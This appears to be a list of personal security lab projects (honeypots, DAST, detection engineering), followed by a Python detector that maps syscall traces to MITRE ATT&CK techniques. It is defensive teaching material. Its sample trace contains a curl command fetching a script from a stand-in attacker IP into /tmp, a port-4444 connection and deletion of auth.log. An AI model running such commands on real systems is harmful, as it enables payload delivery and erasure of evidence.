Personal SOC lab using T-Pot CE on AWS to analyze real-world attack telemetry through honeypots, Suricata, and offline log analysis
Updated Jan 21, 2026
Pentest Lab: Recon (Nmap) + DAST (OWASP ZAP baseline/full) against OWASP Juice Shop with reproducible HTML/TXT/PNG evidence and optional SOC correlation.
Command-line (proctitle) classification into MITRE ATT&CK techniques using TF-IDF + Logistic Regression and an LSTM baseline, with a custom token pattern tailored for cyber artifacts (IPs, paths, flags, URLs).
SOC-style ransomware investigation using KQL (Azure Data Explorer)
Behavior-based Linux malware profiler: ptrace syscall tracing → JSONL events → heuristic analysis with IOC extraction & MITRE ATT&CK mapping. No signatures, no hashes
EDR/XDR detection coverage, gaps, and governance considerations for enterprise environments
Enterprise Active Directory security lab focused on privileged access hardening, audit policy configuration, detection engineering, and incident response. Simulates unauthorized privilege escalation attacks with forensic log analysis and MITRE ATT&CK mapping.
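The ptrace-based profiler entry above describes a pipeline of syscall tracing to JSONL events to heuristic analysis with IOC extraction and ATT&CK mapping. The stage that is easiest to get wrong is the last one, so here is an added example of that heuristic stage, written for this page and not taken from the repository: it reads JSONL syscall events, applies a handful of behavioural rules, and returns the ATT&CK technique IDs together with the evidence and the IOCs (external IPs, URLs, staging paths). The event schema (`syscall`, `args.path`, `args.argv`, `args.ip`, `args.port`, `args.flags`, `args.mode`) and the `SAMPLE_JSONL` trace are constructed assumptions for the example; the documentation range 198.51.100.0/24 stands in for an attacker host and is deliberately treated as external here.

```python
import json
import re
from ipaddress import ip_address, ip_network

# Constructed JSONL trace (one JSON object per syscall); schema is assumed.
SAMPLE_JSONL = """\
{"ts": 1.0, "pid": 4242, "syscall": "execve", "args": {"path": "/bin/sh", "argv": ["sh", "-c", "curl -s http://198.51.100.23/p.sh -o /tmp/.p"]}}
{"ts": 1.1, "pid": 4242, "syscall": "connect", "args": {"ip": "198.51.100.23", "port": 80}}
{"ts": 1.2, "pid": 4242, "syscall": "openat", "args": {"path": "/tmp/.p", "flags": "O_WRONLY|O_CREAT"}}
{"ts": 1.3, "pid": 4242, "syscall": "chmod", "args": {"path": "/tmp/.p", "mode": "0755"}}
{"ts": 1.4, "pid": 4242, "syscall": "openat", "args": {"path": "/etc/cron.d/update", "flags": "O_WRONLY|O_CREAT"}}
{"ts": 1.5, "pid": 4242, "syscall": "connect", "args": {"ip": "198.51.100.23", "port": 4444}}
{"ts": 1.6, "pid": 4242, "syscall": "unlink", "args": {"path": "/var/log/auth.log"}}
{"ts": 1.7, "pid": 4242, "syscall": "connect", "args": {"ip": "127.0.0.1", "port": 53}}
{"ts": 1.8, "pid": 4242, "syscall": "read", "args": {"fd": 3}}
"""

# Explicit internal ranges rather than ipaddress.is_global, which also
# classifies the documentation ranges used in this sample as non-global.
INTERNAL_NETS = [ip_network(n) for n in ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CRON_PREFIXES = ("/etc/cron", "/var/spool/cron")
LOG_PREFIXES = ("/var/log/",)
STAGING_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/")
SHELLS = ("/sh", "/bash", "/dash", "/zsh")
DOWNLOADERS = ("curl", "wget")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def is_write(flags):
    return any(f in flags for f in ("O_WRONLY", "O_RDWR", "O_CREAT"))


def analyze(jsonl_text):
    """Map a JSONL syscall trace to ATT&CK techniques and extract IOCs."""
    techniques = {}
    iocs = {"ips": set(), "urls": set(), "paths": set()}

    def hit(tid, name, evidence):
        techniques.setdefault(tid, {"name": name, "evidence": []})["evidence"].append(evidence)

    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        sc, a = ev["syscall"], ev.get("args", {})
        if sc == "execve":
            argv = a.get("argv", [])
            cmd = " ".join(argv)
            if a.get("path", "").endswith(SHELLS) and "-c" in argv:
                hit("T1059.004", "Command and Scripting Interpreter: Unix Shell", cmd)
            if any(tok in DOWNLOADERS for tok in cmd.split()):
                hit("T1105", "Ingress Tool Transfer", cmd)
            iocs["urls"].update(URL_RE.findall(cmd))
            iocs["paths"].update(t for t in cmd.split() if t.startswith(STAGING_PREFIXES))
        elif sc == "connect" and is_external(a["ip"]):
            iocs["ips"].add(a["ip"])
            dest = f"{a['ip']}:{a['port']}"
            if a["port"] in (80, 443):
                hit("T1071.001", "Application Layer Protocol: Web Protocols", dest)
            else:
                hit("T1571", "Non-Standard Port", dest)
        elif sc == "openat" and is_write(a.get("flags", "")):
            path = a["path"]
            if path.startswith(CRON_PREFIXES):
                hit("T1053.003", "Scheduled Task/Job: Cron", path)
            if path.startswith(STAGING_PREFIXES):
                iocs["paths"].add(path)
        elif sc == "chmod" and int(a["mode"], 8) & 0o111:
            hit("T1222.002", "File and Directory Permissions Modification: Linux and Mac", a["path"])
            if a["path"].startswith(STAGING_PREFIXES):
                iocs["paths"].add(a["path"])
        elif sc == "unlink" and a["path"].startswith(LOG_PREFIXES):
            hit("T1070.002", "Indicator Removal: Clear Linux or Mac System Logs", a["path"])

    return {"techniques": techniques, "iocs": {k: sorted(v) for k, v in iocs.items()}}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_JSONL), indent=2))
```

Because no signatures or hashes are involved, every rule here fires on behaviour that also has benign uses (package managers write to `/etc/cron.d`, log rotation unlinks under `/var/log`), which is why the result keeps the triggering syscall as evidence instead of emitting a bare technique ID: the analyst, not the rule, decides whether the combination is malicious.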